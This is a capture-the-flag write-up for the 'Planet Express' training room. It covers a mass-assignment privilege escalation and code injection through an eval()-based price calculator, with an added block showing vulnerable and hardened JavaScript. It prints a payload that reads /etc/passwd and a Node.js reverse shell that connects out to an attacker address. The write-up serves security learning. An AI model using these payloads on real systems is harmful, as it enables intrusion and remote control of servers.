THM: Planet Express (Hard)

Fast, affordable, and out of this world!

This CTF is not yet available publicly, but hopefully soon!

Flag 1

Enumeration

We discover which ports are open and see 80 (HTTP) and 22 (SSH).

nmap 10.10.227.249

We can scan for directories and leave that running while we explore the site manually.

ffuf -u http://10.10.227.249/FUZZ -w /usr/share/wordlists/dirb/common.txt

Browsing to /admin gives us an error.

Register an account.

We still get access denied on the /admin endpoint, so we will try to create an account with admin privileges using mass assignment: submitting extra fields in the registration request in the hope that the server copies them straight into the new account.

Exploitation

There are a number of combinations we can try, such as:

admin=true
admin=1
account=admin
account=administrator
privilege=admin
privilege=administrator
privs=true
privileges=admin
privileges=administrator

Writing a short script to generate candidate payloads is the easiest way to do this, but given that the error message mentions "privilege" and "admin", we will focus on those.

We log in to the account once it's created, and then try to access /admin.

We are successful! The first flag is given to us on the page.

Flag 2

Enumeration

Clicking "calculate price" updates the page with a number, and in our proxy we can see the POST request behind it.

Exploitation

Sending modified requests indicates that the application may be passing the values into a function such as eval(): it interprets inputs such as +1 and -1 as arithmetic rather than throwing an error. The null price for a division by zero is consistent with this too, since JSON.stringify() serialises the resulting Infinity as null.

orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001
{"price":182661}

orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001-1
{"price":182660}

orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001/0
{"price":null}
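As an added example (not the room's code or the author's), here are the two defects this room turns on, each beside a hardened form: a registration handler that copies every body field into the user record (flag 1) and a price calculator that evaluates its inputs (flag 2). The field names, the price formula and the request shape are assumptions; the comments note why the {"price":null} response above is what an eval-based calculator would return for 5001/0.

```javascript
// Added example: not the room's real code. Field names, the price formula and
// the request shape are assumptions; only the shape of the defect matches.

// --- Flag 1: mass assignment on registration ---
// Vulnerable: every key from the request body is copied into the new user
// record, so a client-supplied "privilege" field overrides the default.
function registerVulnerable(body) {
  return { privilege: 'user', ...body };
}

// Hardened: copy only the fields the server expects; privilege is set
// server-side and never read from the request.
function registerHardened(body) {
  return {
    username: String(body.username),
    password: String(body.password),
    privilege: 'user',
  };
}

// --- Flag 2: arithmetic on user input via eval() ---
// Vulnerable: the dimensions are concatenated into a string and evaluated, so
// "5001-1" is computed as arithmetic and any other JavaScript runs as well.
function priceVulnerable(q) {
  const price = eval(`(${q.length})*(${q.height})*(${q.width}) + (${q.weight})`);
  // JSON.stringify turns Infinity (e.g. from "5001/0") and NaN into null,
  // which is the {"price":null} response seen in the writeup.
  return JSON.stringify({ price });
}

// Hardened: accept only a plain decimal literal, convert it with Number(),
// and bound-check it; malformed input is rejected instead of evaluated.
function toDimension(value, max) {
  if (typeof value !== 'string' || !/^\d+(\.\d+)?$/.test(value)) {
    throw new Error('invalid number');
  }
  const n = Number(value);
  if (!Number.isFinite(n) || n <= 0 || n > max) throw new Error('out of range');
  return n;
}

function priceHardened(q) {
  const l = toDimension(q.length, 1000);
  const h = toDimension(q.height, 1000);
  const w = toDimension(q.width, 1000);
  const kg = toDimension(q.weight, 10000);
  return JSON.stringify({ price: l * h * w + kg });
}
```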

We can test RCE with the following payload.

;fs=require('fs');fs.readFileSync('/etc/passwd').toString()

We can upgrade to a shell with the following payload.

;(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<your-ip>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();

That's it! I hope you enjoyed the challenge and learned a bit about mass assignment and RCE in Node.js applications 👍

If you like my content, please feel free to connect on LinkedIn or drop into one of our live streams!
